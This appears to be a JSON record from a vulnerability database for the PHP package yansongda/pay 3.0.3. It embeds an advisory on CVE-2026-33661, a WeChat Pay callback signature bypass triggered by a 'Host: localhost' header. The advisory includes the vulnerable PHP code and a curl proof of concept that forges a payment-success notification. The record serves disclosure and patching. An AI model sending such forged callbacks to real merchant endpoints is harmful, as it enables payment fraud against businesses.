{"url":"http://public2.vulnerablecode.io/api/packages/993397?format=json","purl":"pkg:composer/yansongda/pay@3.0.3","type":"composer","namespace":"yansongda","name":"pay","version":"3.0.3","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"3.7.20","latest_non_vulnerable_version":"3.7.20","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91620?format=json","vulnerability_id":"VCID-d7j9-ubqn-wkhf","summary":"WeChat Pay callback signature verification bypassed when Host header is localhost\n## Summary\n\nThe `verify_wechat_sign()` function in `src/Functions.php` unconditionally **skips all signature verification** when the PSR-7 request reports `localhost` as the host. An attacker can exploit this by sending a crafted HTTP request to the WeChat Pay callback endpoint with a `Host: localhost` header, bypassing the RSA signature check entirely.\n\nThis allows forging fake WeChat Pay payment success notifications, potentially causing applications to mark orders as paid without actual payment.\n\n## Vulnerable Code\n\n**`src/Functions.php` lines 243-246:**\n```php\nfunction verify_wechat_sign(ResponseInterface|ServerRequestInterface $message, array $params): void\n{\n    // BYPASS: Returns without any signature check if Host header is localhost\n    if ($message instanceof ServerRequestInterface && 'localhost' === $message->getUri()->getHost()) {\n        return;  // No signature verified!\n    }\n\n    // ... openssl_verify() only reached when Host != localhost\n    $wechatSerial = $message->getHeaderLine('Wechatpay-Serial');\n    $sign = $message->getHeaderLine('Wechatpay-Signature');\n    $result = 1 === openssl_verify($content, base64_decode($sign), $public, 'sha256WithRSAEncryption');\n}\n```\n\nIn PSR-7 implementations (Nyholm, Guzzle PSR-7, etc.), `$request->getUri()->getHost()` reads the `Host` HTTP header, which is fully attacker-controlled.\n\n## Proof of Concept\n\n```bash\ncurl -X POST https://merchant.example.com/payment/wechat/callback \\\n  -H \"Host: localhost\" \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Wechatpay-Serial: any\" \\\n  -H \"Wechatpay-Timestamp: 1234567890\" \\\n  -H \"Wechatpay-Nonce: abc\" \\\n  -H \"Wechatpay-Signature: AAAA\" \\\n  -d '{\"id\":\"fake-order\",\"event_type\":\"TRANSACTION.SUCCESS\"}'\n```\n\n`verify_wechat_sign()` returns immediately without verifying the signature. The application marks the order as paid.\n\n## Impact\n\n- **Payment fraud**: Attacker receives goods/services without actual payment by forging WeChat Pay callbacks\n- **No authentication required**: Pure network attack, zero privileges needed\n- **Wide reach**: Affects any application using `yansongda/pay` for WeChat Pay callback validation. However, in most environments, Nginx/Ingress/Cloudflare/WAF will directly reject the forgery of this request header, so there is no need to worry too much.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33661","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.0372","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03698","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03687","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03711","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03717","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33661"},{"reference_url":"https://github.com/yansongda/pay","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/yansongda/pay"},{"reference_url":"https://github.com/yansongda/pay/commit/26987ebf789f1e7f0a85febb640986ab4289fd7f","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-27T14:12:47Z/"}],"url":"https://github.com/yansongda/pay/commit/26987ebf789f1e7f0a85febb640986ab4289fd7f"},{"reference_url":"https://github.com/yansongda/pay/releases/tag/v3.7.20","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-27T14:12:47Z/"}],"url":"https://github.com/yansongda/pay/releases/tag/v3.7.20"},{"reference_url":"https://github.com/yansongda/pay/security/advisories/GHSA-q938-ghwv-8gvc","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-27T14:12:47Z/"}],"url":"https://github.com/yansongda/pay/security/advisories/GHSA-q938-ghwv-8gvc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33661","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33661"},{"reference_url":"https://github.com/advisories/GHSA-q938-ghwv-8gvc","reference_id":"GHSA-q938-ghwv-8gvc","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q938-ghwv-8gvc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113935?format=json","purl":"pkg:composer/yansongda/pay@3.7.20","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/yansongda/pay@3.7.20"}],"aliases":["CVE-2026-33661","GHSA-q938-ghwv-8gvc"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-d7j9-ubqn-wkhf"}],"fixing_vulnerabilities":[],"risk_score":"4.0","resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/yansongda/pay@3.0.3"}